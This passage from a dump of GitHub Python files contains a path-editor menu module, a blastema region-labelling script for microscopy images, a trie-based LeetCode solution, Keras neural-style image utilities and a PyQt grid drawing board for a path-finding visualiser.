targetEntity.model.toggleDirection()\n\n # make a save state\n ProjectHistoryInterface.getInstance().save()\n\n# When clicked, splits segment and creates temporary node that follows mouse\nclass InsertNodeAction(MenuClickAction[StraightSegmentEntity]):\n def onClick(self, targetEntity: StraightSegmentEntity, mouse: tuple):\n\n segment = targetEntity.model\n\n mouseInches = segment.field.mouseToInches(mouse)\n newNode = segment.path.insertNode(segment, mouseInches, isTemporary = True)\n return newNode\n \n# When clicked, splits segment and creates temporary node that follows mouse\nclass ToggleSegmentTypeAction(MenuClickAction[StraightSegmentEntity]):\n\n # Get the current segment type\n def getStateID(self, targetEntity: StraightSegmentEntity) -> Enum:\n return targetEntity.model.getType()\n\n def onClick(self, targetEntity: StraightSegmentEntity, mouse: tuple):\n \n current = self.getStateID(targetEntity)\n segment = targetEntity.model\n\n if current == SegmentType.STRAIGHT:\n segment.setState(SegmentType.ARC)\n elif current == SegmentType.ARC:\n segment.setState(SegmentType.BEZIER)\n elif current == SegmentType.BEZIER:\n segment.setState(SegmentType.STRAIGHT)\n else:\n raise Exception(\"Invalid segment type\") \n\n # make a save state\n ProjectHistoryInterface.getInstance().save() \n\n\"\"\"\nMenu for segments. Functionality for:\n - revealing command associated with node\n - Toggle segment type\n - Toggle reverse direction\n\"\"\"\ndef configureSegmentMenu() -> MenuDefinition:\n\n segmentDefinition = MenuDefinition(AbstractSegmentEntity)\n\n # Reveals the corresponding command\n states = ImageStatesFactory()\n states.addState(HighlightID.START_HIGHLIGHTING, ImageID.REVEAL_COMMAND, \"Highlight the corresponding command\")\n states.addState(HighlightID.STOP_HIGHLIGHTING, ImageID.REVEAL_COMMAND, \"Stop highlighting the corresponding command\")\n segmentDefinition.add(states.create(), HighlightCommandAction())\n \n # Add a button that toggles the direction of the segment\n states = ImageStatesFactory()\n states.addState(DirectionButtonID.STRAIGHT_FORWARD, ImageID.STRAIGHT_FORWARD, \"Direction: forward\")\n states.addState(DirectionButtonID.STRAIGHT_REVERSE, ImageID.STRAIGHT_REVERSE, \"Direction: reverse\")\n states.addState(DirectionButtonID.CURVE_FORWARD, ImageID.CURVE_LEFT_FORWARD, \"Direction: forward\")\n states.addState(DirectionButtonID.CURVE_REVERSE, ImageID.CURVE_LEFT_REVERSE, \"Direction: reverse\")\n segmentDefinition.add(states.create(), InvertDirectionAction())\n\n # Add a button that toggles segment type\n states = ImageStatesFactory()\n states.addState(SegmentType.STRAIGHT, ImageID.STRAIGHT_SEGMENT, \"Segment type: straight\")\n states.addState(SegmentType.ARC, ImageID.ARC_SEGMENT, \"Segment type: arc\")\n states.addState(SegmentType.BEZIER, ImageID.CURVE_SEGMENT, \"Segment type: bezier\")\n segmentDefinition.add(states.create(), ToggleSegmentTypeAction())\n \n # Inserts a node which splits this segment into two. 
New node is set to temporary and following mouse position\n states = ImageStatesFactory()\n states.addState(0, ImageID.ADD_NODE, \"Splits this segment to insert a node\")\n segmentDefinition.add(states.create(), InsertNodeAction())\n\n return segmentDefinition","repo_name":"AnselChang/Pathogen4","sub_path":"entity_ui/selector_menu/configurations/segment_menu.py","file_name":"segment_menu.py","file_ext":"py","file_size_in_byte":4965,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"6"} +{"seq_id":"73831982267","text":"#!/usr/bin/env python3\n\nimport sys\nimport getopt\nimport numpy as np\nimport pandas as pd\nfrom skimage import io as skio\n\n########################################################\n# main logic function\n#\ndef get_blastema(sample,prefix,ll,lr,rl,rr,exponential_number,wound_only):\n base_file = f'{sample}_masked.tif'\n left_edge_file = f'{sample}_left.tif'\n right_edge_file = f'{sample}_right.tif'\n pos_file = f'{sample}_pos.txt'\n\n base = skio.imread(base_file)\n y, x ,z = np.nonzero(base)\n ymin = np.min(y)\n ymax = np.max(y)\n xmax = np.max(x)\n H,W,D = base.shape\n\n yvals = np.array(range(ymin, ymax+1),dtype=int)\n def mask_one_edge( fname , yvals , ymin,exponential_number,xmax):\n ########################################################\n # get edge points\n #\n masked_edge_data = skio.imread(fname)\n y, x = np.nonzero(masked_edge_data)\n fit_ymin = np.min(y)\n fit_ymax = np.max(y)\n ########################################################\n # fit edge line\n #\n # let x->y y->x to fit vertical line\n flist = np.polyfit(y, x, exponential_number)\n ########################################################\n # plot final line\n xret = np.polyval(flist, yvals).astype(int)\n xret [ xret < 0 ] = 0\n xret [ xret > xmax ] = xmax\n return flist, xret , y , x\n flist , x_l , sy_l, sx_l = mask_one_edge(left_edge_file, yvals,ymin, exponential_number ,W-1)\n #print(f'the left polyfit parameter is : {flist}',flush=True)\n linedf = pd.DataFrame()\n linedf['x'] = x_l\n linedf['y'] = yvals\n linedf['x'] = linedf['x']*3\n linedf['y'] = linedf['y']*3\n #linedf['y'] = yvals\n linedf.to_csv(f'{prefix}.left_line.csv',header=True,sep='\\t',index=False)\n flist , x_r , sy_r, sx_r = mask_one_edge(right_edge_file, yvals,ymin ,exponential_number,W-1)\n #print(f'the right polyfit parameter is : {flist}',flush=True)\n linedf = pd.DataFrame()\n linedf['x'] = x_l\n linedf['y'] = yvals\n linedf['x'] = linedf['x']*3\n linedf['y'] = linedf['y']*3\n #linedf['y'] = yvals\n linedf.to_csv(f'{prefix}.right_line.csv',header=True,sep='\\t',index=False)\n raw = base.copy()\n base[sy_l , sx_l, 1] = 255 \n base[sy_r , sx_r, 1] = 255 \n base[yvals, x_l, 0] = 255\n base[yvals, x_r, 0] = 255\n skio.imsave(f'{prefix}.edge.tif',base.astype('uint8'))\n\n labels = np.zeros((H,W),dtype='uint8')\n label_array = [0,1,2,3,4,5,6,7]\n if wound_only:\n label_array = [0,3,3,3,4,5,5,5]\n for i in range(len(yvals)):\n y_index = yvals[i]-ymin\n if x_l[y_index] != 0 and x_r[y_index] != 0 :\n labels[yvals[i], 0 : x_l[y_index] - ll ] = label_array[1]\n labels[yvals[i], x_l[y_index] - ll : x_l[y_index] ] = label_array[2]\n labels[yvals[i], x_l[y_index] : x_l[y_index] + lr ] = label_array[3]\n labels[yvals[i], x_l[y_index] + lr : x_r[y_index] - rl ] = label_array[4]\n labels[yvals[i], x_r[y_index] - rl : x_r[y_index] ] = label_array[5]\n labels[yvals[i], x_r[y_index] : x_r[y_index] + rr ] = label_array[6]\n labels[yvals[i], x_r[y_index] + rr : ] = label_array[7]\n elif x_l[y_index] != 0 
and x_r[y_index] == 0 :\n labels[yvals[i], 0 : x_l[y_index] - ll ] = label_array[1]\n labels[yvals[i], x_l[y_index] - ll : x_l[y_index] ] = label_array[2]\n labels[yvals[i], x_l[y_index] : x_l[y_index] + lr ] = label_array[3]\n labels[yvals[i], x_l[y_index] + lr : ] = label_array[4]\n elif x_l[y_index] == 0 and x_r[y_index] != 0 :\n labels[yvals[i], : x_r[y_index] - rl ] = label_array[4]\n labels[yvals[i], x_r[y_index] - rl : x_r[y_index] ] = label_array[5]\n labels[yvals[i], x_r[y_index] : x_r[y_index] + rr ] = label_array[6]\n labels[yvals[i], x_r[y_index] + rr : ] = label_array[7]\n else:\n labels[yvals[i], : ] = label_array[4]\n\n label_all_df = pd.DataFrame()\n #raw = base.copy()\n base[:,:,:]=0\n\n label = np.where(labels==1)\n base[label[0],label[1],0] = 255 #draw 1 as red\n\n label_df = pd.DataFrame()\n label_df['y'] = label[0]\n label_df['x'] = label[1]\n label_df['l'] = np.ones(len(label[0])) *1\n label_all_df = label_df \n\n label = np.where(labels==2)\n base[label[0],label[1],1] = 255 #draw 2 as green\n\n label_df = pd.DataFrame()\n label_df['y'] = label[0]\n label_df['x'] = label[1]\n label_df['l'] = np.ones(len(label[0])) *2\n label_all_df = pd.concat([ label_all_df, label_df ], ignore_index=True)\n\n label = np.where(labels==3)\n base[label[0],label[1],0] = 255 #draw 3 as magenta \n base[label[0],label[1],2] = 255 #draw 3 as magenta \n label_df = pd.DataFrame()\n label_df['y'] = label[0]\n label_df['x'] = label[1]\n label_df['l'] = np.ones(len(label[0])) *3\n label_all_df = pd.concat([ label_all_df, label_df ], ignore_index=True)\n\n label = np.where(labels==4)\n base[label[0],label[1],0] = 255 #draw 4 as yellow\n base[label[0],label[1],1] = 255 #draw 4 as yelow\n label_df = pd.DataFrame()\n label_df['y'] = label[0]\n label_df['x'] = label[1]\n label_df['l'] = np.ones(len(label[0])) *4\n label_all_df = pd.concat([ label_all_df, label_df ], ignore_index=True)\n\n label = np.where(labels==5)\n base[label[0],label[1],:] = 255 #draw 5 as white\n raw[y,x,:] = base[y,x,:]\n label_df = pd.DataFrame()\n label_df['y'] = label[0]\n label_df['x'] = label[1]\n label_df['l'] = np.ones(len(label[0])) *5\n label_all_df = pd.concat([ label_all_df, label_df ], ignore_index=True)\n\n label = np.where(labels==6)\n base[label[0],label[1],1] = 255 #draw 6 as cyan \n base[label[0],label[1],2] = 255 #draw 6 as cyan \n label_df = pd.DataFrame()\n label_df['y'] = label[0]\n label_df['x'] = label[1]\n label_df['l'] = np.ones(len(label[0])) *6\n label_all_df = pd.concat([ label_all_df, label_df ], ignore_index=True)\n\n label = np.where(labels==7)\n base[label[0],label[1],0] = 255 #draw 7 as orange\n base[label[0],label[1],1] = 69 #draw 7 as orange\n label_df = pd.DataFrame()\n label_df['y'] = label[0]\n label_df['x'] = label[1]\n label_df['l'] = np.ones(len(label[0])) *7\n label_all_df = pd.concat([ label_all_df, label_df ], ignore_index=True)\n\n\n raw[y,x,:] = base[y,x,:]\n skio.imsave(f'{prefix}.class.tif',raw.astype('uint8'))\n\n pos_file_df = pd.read_csv(pos_file,sep=',',header=None)\n pos_file_df.columns = ['label','cell','x','y','z']\n pos_file_df['x'] = pos_file_df['x'] / 3\n pos_file_df['x'] = pos_file_df['x'].astype(int) \n pos_file_df['y'] = pos_file_df['y'] / 3\n pos_file_df['y'] = pos_file_df['y'].astype(int) \n\n output = pos_file_df.merge(label_all_df, on=['x' ,'y'])\n output['l'] = output['l'].astype(int)\n output.to_csv(f'{prefix}.class.csv',sep='\\t',columns=['label','cell','l'],index=None) \n\n########################################################\n# usage\n#\ndef usage():\n 
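# The help text below documents the CLI flags and the numeric region labels
# written into the output class map and CSV.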
print(\"\"\"\nUsage\t: python3 BlastemaByWound.py < -p prefix>\n [ -o output prefix, default output]\n [ -e exponential number, default 2]\n [--only_wound yes/no, default no]\n [--ll left wound left extern distance, default 20]\n [--lr left wound right extern distance, default 20]\n [--rl right wound left extern distance, default 20]\n [--rr right wound right extern distance, default 20]\n\nNotice\t: the unit of distance is 3 micron, so the default 10 refer to 60 microns.\n\nExample : \n\t example 01: python3 BlastemaByWound.py -p 12hpa1 \n\t example 02: python3 BlastemaByWound.py -p WT -o test_WT\n\t example 02: python3 BlastemaByWound.py -p 5dpa1 -o test_5dpa1 -e 3\n example 03: python3 BlastemaByWound.py -p 3dpa1 -o test_3dpa1_lr15 --lr 15\n\nOutput label :\n 1 -- [red] left blastema\n 2 -- [green] left margin of left wound \n 3 -- [magenta] right margin of left wound \n 4 -- [yellow] body\n 5 -- [white] left margin of right wound\n 6 -- [cyan] right margin of right wound\n 7 -- [orange] right blastema\n\nOutput label in only_wound mode:\n 3 -- [magenta] left wound region, similar to 1+2+3 in blastema mode\n 4 -- [yellow] body\n 5 -- [white] right wound region, similar to 5+6+7 in blastema mode\n\"\"\",flush=True)\n\n########################################################\n# main\n#\ndef main(argv):\n ########################\n # no args equal to -h\n if len(argv) == 0 :\n usage()\n sys.exit(0)\n\n ########################\n # default values\n sample = ''\n prefix = 'output'\n ll = lr = rl = rr = 20\n exponential_number = 2\n wound_only = False\n ########################\n # parse args\n try:\n opts, args = getopt.getopt(argv,\"hp:o:\",[\"help\",\n \"ll=\",\n \"lr=\",\n \"rl=\",\n \"rr=\",\n \"only_wound=\",\n ])\n except getopt.GetoptError:\n usage()\n sys.exit(2)\n for opt, arg in opts:\n if opt in (\"-h\", \"--help\"):\n usage()\n sys.exit(0)\n elif opt in (\"-p\" ):\n sample = arg \n elif opt in (\"-o\" ):\n prefix = arg\n elif opt in (\"--ll\" ):\n ll = int(arg)\n elif opt in (\"--lr\" ):\n lr = int(arg)\n elif opt in (\"--rl\" ):\n rl = int(arg)\n elif opt in (\"--rr\" ):\n rr = int(arg)\n elif opt in (\"--only_wound\"):\n if arg == 'yes':\n wound_only = True\n\n ########################\n # sanity check\n #if sample not in [ '0hpa1','0hpa2','10dpa1','10dpa2','12hpa1','12hpa2','14dpa1','14dpa2','36hpa1', '36hpa2','3dpa1', '3dpa2', '5dpa1','5dpa2', '7dpa1' ,'7dpa2','WT' ]:\n # print(f'Error : invalid sample name : \\\" -s {sample}\\\"',flush=True)\n # usage()\n # sys.exit(1)\n\n ########################\n # do the job \n get_blastema(sample,prefix,ll,lr,rl,rr,exponential_number,wound_only)\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n\n","repo_name":"BGI-Qingdao/4D-BioReconX","sub_path":"Other/assign_blastema_region/BlastemaByWound_v2.py","file_name":"BlastemaByWound_v2.py","file_ext":"py","file_size_in_byte":10735,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"6"} +{"seq_id":"32152670415","text":"from typing import Optional, List\n\nfrom utils import call_with_inputs\n\n\nclass MagicDictionary:\n \"\"\"\n https://leetcode.com/problems/implement-magic-dictionary/\n\n Return True if there is a word in the dictionary which differs in exactly one character, not more not less. 
Otherwise return False.\n    \"\"\"\n\n    def __init__(self):\n        self.node = CharNode(None)\n\n    def buildDict(self, dictionary: List[str]) -> None:\n        for word in dictionary:\n            self.node.insert(word)\n\n    def search(self, searchWord: str) -> bool:\n        return self.node.search(searchWord, 1)\n\n\nclass CharNode:\n\n    def __init__(self, char: Optional[str]):\n        if char is not None:\n            self.char = char\n\n        else:\n            self.char = None\n\n        self.char_dict = dict()\n        self.is_final = False\n\n    def insert(self, word: str):\n        if len(word) == 0:\n            self.is_final = True\n\n        else:\n            char = word[0:1]\n            subword = word[1:]\n            child = self.char_dict.get(char)\n            if child is None:\n                child = CharNode(char)\n                self.char_dict[char] = child\n\n            child.insert(subword)\n\n    def search(self, word: str, remaining_edits: int):\n        if len(word) == 0:\n            return self.is_final and remaining_edits == 0\n\n        else:\n            char = word[0:1]\n            subword = word[1:]\n\n            child = self.char_dict.get(char)\n            if child is not None and child.search(subword, remaining_edits):\n                return True\n\n            if remaining_edits > 0:\n                for child_char, child in self.char_dict.items():\n                    if child_char != char and child.search(subword, remaining_edits - 1):\n                        return True\n\n            return False\n\n\nmd = MagicDictionary()\ncall_with_inputs(md, [\"buildDict\", \"search\", \"search\", \"search\", \"search\"],\n                 [[[\"hello\", \"leetcode\"]], [\"hello\"], [\"hhllo\"], [\"hell\"], [\"leetcoded\"]],\n                 [None, False, True, False, False])\n","repo_name":"vackosar/coding-practice","sub_path":"magic_dictionary.py","file_name":"magic_dictionary.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"}
{"seq_id":"15800063531","text":"from scipy.misc import imread, imresize, imsave, fromimage, toimage\nfrom sklearn.feature_extraction.image import reconstruct_from_patches_2d, extract_patches_2d\nfrom PIL import Image\nimport numpy as np\nimport os\n\nfrom keras import backend as K\n\naspect_ratio = 0\nimg_WIDTH, img_HEIGHT = 0, 0\n\n\n# Util function to open, resize and format pictures into appropriate tensors\ndef preprocess_image(image_path, img_width=256, img_height=256, load_dims=False, resize=True, size_multiple=4):\n    '''\n    Preprocess the image so that it can be used by Keras.\n\n    Args:\n        image_path: path to the image\n        img_width: image width after resizing. Optional: defaults to 256\n        img_height: image height after resizing. Optional: defaults to 256\n        load_dims: decides if original dimensions of image should be saved,\n            Optional: defaults to False\n        vgg_normalize: decides if vgg normalization should be applied to image.\n            Optional: defaults to False\n        resize: whether the image should be resized to new size.
Optional: defaults to True\n size_multiple: Deconvolution network needs precise input size so as to\n divide by 4 (\"shallow\" model) or 8 (\"deep\" model).\n\n Returns: an image of shape (3, img_width, img_height) for dim_ordering = \"th\",\n else an image of shape (img_width, img_height, 3) for dim ordering = \"tf\"\n\n '''\n img = imread(image_path, mode=\"RGB\") # Prevents crashes due to PNG images (ARGB)\n if load_dims:\n global img_WIDTH, img_HEIGHT, aspect_ratio\n img_WIDTH = img.shape[0]\n img_HEIGHT = img.shape[1]\n aspect_ratio = img_HEIGHT / img_WIDTH\n\n if resize:\n if img_width < 0 or img_height < 0: # We have already loaded image dims\n img_width = (img_WIDTH // size_multiple) * size_multiple # Make sure width is a multiple of 4\n img_height = (img_HEIGHT // size_multiple) * size_multiple # Make sure width is a multiple of 4\n img = imresize(img, (img_width, img_height))\n\n if K.image_dim_ordering() == \"th\":\n img = img.transpose((2, 0, 1)).astype(np.float32)\n else:\n img = img.astype(np.float32)\n\n img = np.expand_dims(img, axis=0)\n return img\n\n\n# Util function to convert a tensor into a valid image\ndef deprocess_image(x):\n '''\n Removes the pre processing steps applied to image.\n\n Args:\n x: input image of shape (3, img_width, img_height) [th],\n or input image of shape (img_width, img_height, 3) [tf]\n denormalize_vgg: whether vgg normalization should be reversed\n\n Returns: image of same shape as input shape\n\n '''\n if K.image_dim_ordering() == \"th\":\n x = x.transpose((1, 2, 0))\n\n x = np.clip(x, 0, 255).astype('uint8')\n return x\n\n\n# Util function to preserve image color\ndef original_color_transform(content, generated):\n '''\n Applies the color space of content image to the generated image\n\n Args:\n content: input image of shape (img_width, img_height, 3)\n generated: input image of shape (img_width, img_height, 3)\n\n Returns: image of same shape as input shape\n\n '''\n generated = fromimage(toimage(generated), mode='YCbCr') # Convert to YCbCr color space\n generated[:, :, 1:] = content[:, :, 1:] # Generated CbCr = Content CbCr\n generated = fromimage(toimage(generated, mode='YCbCr'), mode='RGB') # Convert to RGB color space\n return generated\n\n\n# Util function to save intermediate images\ndef save_result(img, fname, img_width=None, img_height=None, preserve_color=False, content_img_path=None, directory=None):\n '''\n Save the resultant image\n\n Args:\n img: input image of shape (img_width, img_height, 3)\n fname: filename of output image\n img_width: resize dimension\n img_height: resize dimension\n preserve_color: whether to preserve original color of the content image\n content_img_path: path to content image. Optional, but required if color preservation is required\n directory: base directory where image will be stored\n\n '''\n if directory is not None:\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n fname = directory + fname\n\n # We require original image if we are to preserve color in YCbCr mode\n if preserve_color:\n assert content_img_path is not None, \\\n \"If color is to be preserved, then content image path must be given as well.\"\n\n content = imread(content_img_path, mode=\"YCbCr\")\n if img_width is not None and img_height is not None:\n content = imresize(content, (img_width, img_height))\n img = original_color_transform(content, img)\n\n imsave(fname, img)\n\ndef _check_image(path, i, nb_images):\n '''\n Test if image can be loaded by PIL. 
If image cannot be loaded, delete it from dataset.\n\n Args:\n path: path to image\n i: iteration number\n nb_images: total number of images\n\n '''\n try:\n im = Image.open(path)\n im.verify()\n im = Image.open(path)\n im.load()\n if i % 1000 == 0: print('%0.2f percent images are checked.' % (i * 100 / nb_images))\n except:\n os.remove(path)\n print(\"Image number %d is corrupt (path = %s). Deleting from dataset.\" % (i, path))\n\ndef check_dataset(path):\n '''\n Use to check the dataset for any jpg corruptions.\n If there exists corruption in an image, then it is deleted.\n\n Note:\n If due to some reason the corrupted file cannot be deleted via os.remove(),\n it will print the path of the file. Please delete the file manually in such a case.\n\n Args:\n path: Path to the dataset of images\n '''\n from multiprocessing.pool import Pool\n pool = Pool()\n\n nb_images = len([name for name in os.listdir(path)])\n print(\"Checking %d images\" % nb_images)\n\n for i, file in enumerate(os.listdir(path)):\n pool.apply_async(_check_image, args=(path + \"\\\\\" + file, i, nb_images))\n\n if i % 1000 == 0: print('%0.2f percent images are added to queue.' % (i * 100 / nb_images))\n\n pool.close()\n pool.join()\n\n new_nb_images = len([name for name in os.listdir(path)])\n print()\n print(\"New size of dataset : %d. Number of images deleted = %d\" % (new_nb_images, nb_images - new_nb_images))\n\nif __name__ == \"__main__\":\n '''\n Run this script to check for corrupt images in an image dataset whose path is provided\n '''\n ms_coco_path = r\"\"\n\n '''\n Note:\n If due to some reason the corrupted file cannot be deleted via os.remove(),\n it will print the path of the file. Please delete the file manually in such a case.\n '''\n check_dataset(ms_coco_path)\n\n\n","repo_name":"titu1994/Fast-Neural-Style","sub_path":"img_utils.py","file_name":"img_utils.py","file_ext":"py","file_size_in_byte":6742,"program_lang":"python","lang":"en","doc_type":"code","stars":110,"dataset":"github-code","pt":"6"} +{"seq_id":"8566572759","text":"from PyQt5.QtWidgets import QWidget\nfrom PyQt5.QtGui import QPainter, QPen\nfrom PyQt5 import QtCore\nfrom multiprocessing import Queue\nfrom threading import Timer, get_ident\nfrom algorithmHandler import AlgorithmHandler\nimport time\nimport constants\n\nclass DrawingBoard(QWidget):\n def __init__(self, obj):\n super().__init__(obj)\n\n self.cellWidth, self.cellHeight = 0, 0\n self.grid = None\n self.selectingStart = False\n self.selectingEnd = False\n self.selectingObstacles = False\n self.comms = None\n self.gridNeedsCleaning = False\n\n self.startPosition = None\n self.endPosition = None\n\n self.updateThreads = []\n\n self.sharedQueue = Queue()\n self.algorithmHandler = AlgorithmHandler(self.sharedQueue)\n\n def resizeEvent(self, event):\n super().resizeEvent(event)\n\n newWidth = self.width()\n newHeight = self.height()\n newCellWidth = newWidth // (constants.CELL_SIZE + constants.MIN_CELL_SPACING)\n newCellHeight = newHeight // (constants.CELL_SIZE + constants.MIN_CELL_SPACING)\n\n if newCellWidth != self.cellWidth or newCellHeight != self.cellHeight:\n self.cellWidth = newCellWidth\n self.cellHeight = newCellHeight\n # if self.comms: # if already exists\n # self.comms.print.emit(\n # \"[DrawingBoard] New Width: \" + str(newCellWidth) + \" new height: \" + str(newCellHeight))\n\n def toggleSelectStart(self):\n self.selectingStart = not self.selectingStart\n return self.selectingStart\n\n def toggleSelectEnd(self):\n self.selectingEnd = not self.selectingEnd\n return 
self.selectingEnd\n\n    def toggleSelectObstacles(self):\n        self.selectingObstacles = not self.selectingObstacles\n        return self.selectingObstacles\n\n    def setFullGrid(self):\n        self.grid = []\n        for j in range(self.cellHeight):\n            row = []\n            for i in range(self.cellWidth):\n                row.append(0)\n            self.grid.append(row)\n        self.update()\n        self.comms.print.emit(\n            \"[DrawingBoard] Full Grid painting set Size: \" + str(self.cellWidth) + \" vs \" + str(self.cellHeight))\n    \n    def cleanFullGrid(self):\n        self.gridNeedsCleaning = False\n        for j in range(self.cellHeight):\n            for i in range(self.cellWidth):\n                if self.grid[j][i] > 3:\n                    self.grid[j][i] = 0\n        self.update()\n        self.comms.print.emit(\n            \"[DrawingBoard] Full Grid cleaned\")\n\n    def clearGrid(self):\n        self.grid = None\n        self.startPosition = None\n        self.endPosition = None\n        self.comms.print.emit(\"[DrawingBoard] Grid cleared\")\n        self.update()\n\n    def paintEvent(self, event):\n        if self.grid is None: # When grid is null it returns painting blank\n            return\n        painter = QPainter()\n        painter.begin(self)\n\n        currGrid = self.grid[:]\n\n        pen_1 = QPen(constants.CELL_COLLORS[0], constants.CELL_SIZE)\n        pen_start = QPen(constants.CELL_COLLORS[1], constants.CELL_SIZE)\n        pen_end = QPen(constants.CELL_COLLORS[2], constants.CELL_SIZE)\n        pen_obstacles = QPen(constants.CELL_COLLORS[3], constants.CELL_SIZE)\n        pen_seen = QPen(constants.CELL_COLLORS[4], constants.CELL_SIZE)\n        pen_path = QPen(constants.CELL_COLLORS[5], constants.CELL_SIZE)\n\n        for j in range(self.cellHeight):\n            for i in range(self.cellWidth):\n                currVal = currGrid[j][i]\n                if currVal == 0:\n                    painter.setPen(pen_1)\n                elif currVal == 1:\n                    painter.setPen(pen_start)\n                elif currVal == 2:\n                    painter.setPen(pen_end)\n                elif currVal == 3:\n                    painter.setPen(pen_obstacles)\n                elif currVal == 4:\n                    painter.setPen(pen_seen)\n                elif currVal == 5:\n                    painter.setPen(pen_path)\n\n                xCoord = i * (constants.CELL_SIZE + constants.MIN_CELL_SPACING) + constants.MIN_CELL_SPACING + constants.CELL_SIZE // 2\n                yCoord = j * (constants.CELL_SIZE + constants.MIN_CELL_SPACING) + constants.MIN_CELL_SPACING + constants.CELL_SIZE // 2\n\n                painter.drawLine(xCoord, yCoord, xCoord, yCoord)\n\n        painter.end()\n\n    def mousePressEvent(self, event):\n        self.handleMouseEvent(event)\n\n    def mouseMoveEvent(self, event):\n        self.handleMouseEvent(event)\n\n    def setGridElem(self, coordX, coordY, val):\n        self.grid[coordY][coordX] = val\n\n    def handleMouseEvent(self, event):\n        if self.grid is None:\n            return\n\n        if self.gridNeedsCleaning:\n            self.cleanFullGrid()\n\n        if event.buttons() & QtCore.Qt.LeftButton:\n            cellNumX = event.pos().x() // (constants.CELL_SIZE + constants.MIN_CELL_SPACING)\n            cellNumY = event.pos().y() // (constants.CELL_SIZE + constants.MIN_CELL_SPACING)\n\n            if cellNumX >= self.cellWidth or cellNumY >= self.cellHeight or cellNumX < 0 or cellNumY < 0:\n                # self.comms.print.emit(\"[DrawingBoard] Selected a Cell out of the drawn grid\")\n                return\n\n            gridElem = self.grid[cellNumY][cellNumX]\n\n            if self.selectingStart:\n                if gridElem != 0:\n                    self.comms.print.emit(\"[DrawingBoard] Cell not empty - Remove assignment first\")\n                    return\n                self.selectingStart = False\n\n                self.setGridElem(cellNumX, cellNumY, 1)\n\n                if self.startPosition is not None:\n                    self.setGridElem(self.startPosition[0], self.startPosition[1], 0)\n\n                self.startPosition = (cellNumX, cellNumY)\n\n                self.update()\n                self.comms.startSelected.emit()\n                self.comms.print.emit(\n                    \"[DrawingBoard] Selected Start position: X: \" + str(cellNumX) + \" Y:\" + str(cellNumY))\n            elif self.selectingEnd:\n                if gridElem != 0:
\n                    self.comms.print.emit(\"[DrawingBoard] Cell not empty - Remove assignment first\")\n                    return\n                self.selectingEnd = False\n\n                self.setGridElem(cellNumX, cellNumY, 2)\n\n                if self.endPosition is not None:\n                    self.setGridElem(self.endPosition[0], self.endPosition[1], 0)\n\n                self.endPosition = (cellNumX, cellNumY)\n\n                self.update()\n                self.comms.endSelected.emit()\n                self.comms.print.emit(\n                    \"[DrawingBoard] Selected End position: X: \" + str(cellNumX) + \" Y:\" + str(cellNumY))\n\n            elif self.selectingObstacles:\n                if gridElem != 0:\n                    # self.comms.print.emit(\"[DrawingBoard] Cell not empty - Remove assignment first\")\n                    return\n\n                self.setGridElem(cellNumX, cellNumY, 3)\n\n                self.update()\n                self.comms.print.emit(\n                    \"[DrawingBoard] Selected Obstacle position: X: \" + str(cellNumX) + \" Y:\" + str(cellNumY))\n\n    def runAlgorithmPressed(self, byStep):\n        if self.gridNeedsCleaning:\n            self.cleanFullGrid()\n        self.gridNeedsCleaning = True\n\n        self.algorithmHandler.runAlgorithm(self.sharedQueue, self.grid, self.cellWidth, self.cellHeight, byStep)\n        s = Timer(constants.DRAWING_UPDATE_TIMER, passiveWaitForAlgorithm, (self, 0))\n        self.updateThreads.append(s)\n        s.start()\n\n    def joinProcessesAndThreads(self):\n        self.comms.print.emit(\"[DrawingBoard] Waiting for threads to terminate\")\n        for thread in self.updateThreads:\n            thread.join()\n        self.comms.print.emit(\"[DrawingBoard] Threads terminated. Going For processes\")\n        self.algorithmHandler.joinProcesses()\n        self.comms.algorithmEnd.clear()\n        self.comms.algorithmInterrupt.clear()\n        self.comms.print.emit(\"[DrawingBoard] Processes terminated.\")\n\n    def setAlgorithmPressed(self):\n        self.algorithmHandler.setAlgorithm(\"Dijkstra\")\n\n    def initComms(self, comms):\n        self.comms = comms\n        self.algorithmHandler.initComms(comms)\n\n    def update(self) -> None:\n        super().update()\n\n\n#######################################################\n# Thread to be thrown to wait for drawings\n#######################################################\ndef passiveWaitForAlgorithm(drawingBoard: DrawingBoard, counter: int):\n    update = None\n    try:\n        update = drawingBoard.sharedQueue.get(0)\n    except Exception:\n        update = None\n\n    if drawingBoard.comms.algorithmInterrupt.is_set():\n        drawingBoard.comms.print.emit(\n            \"[THREAD][\" + str(get_ident()) + \"][DrawingBoard] Received AlgorithmInterrupt Signal - Iteration \" + str(\n                counter))\n        drawingBoard.comms.endParallelAlgorithmsAndThreads.emit()\n        return\n    if update is None:\n        if drawingBoard.comms.algorithmEnd.is_set():\n            drawingBoard.comms.print.emit(\n                \"[THREAD][\" + str(get_ident()) + \"][DrawingBoard] Received AlgorithmEnd Signal - Iteration \" + str(\n                    counter))\n            drawingBoard.comms.endParallelAlgorithmsAndThreads.emit()\n            return\n        drawingBoard.comms.print.emit(\n            \"[THREAD][\" + str(get_ident()) + \"][DrawingBoard] did NOT draw \" + str(counter) + \" iteration\")\n    else:\n        drawingBoard.grid = update\n        drawingBoard.update()\n        # drawingBoard.comms.print.emit(\n        #     \"[THREAD][\" + str(get_ident()) + \"][DrawingBoard] drawing \" + str(counter) + \" iteration done\")\n\n    s = Timer(constants.DRAWING_UPDATE_TIMER, passiveWaitForAlgorithm, (drawingBoard, counter + 1))\n    drawingBoard.updateThreads.append(s)\n    s.start()\n","repo_name":"hpnog/pathFindingProject","sub_path":"ui/drawingBoard.py","file_name":"drawingBoard.py","file_ext":"py","file_size_in_byte":9873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
{"seq_id":"30679650578","text":"# -*-coding:utf-8 -*\n\"\"\"Tests
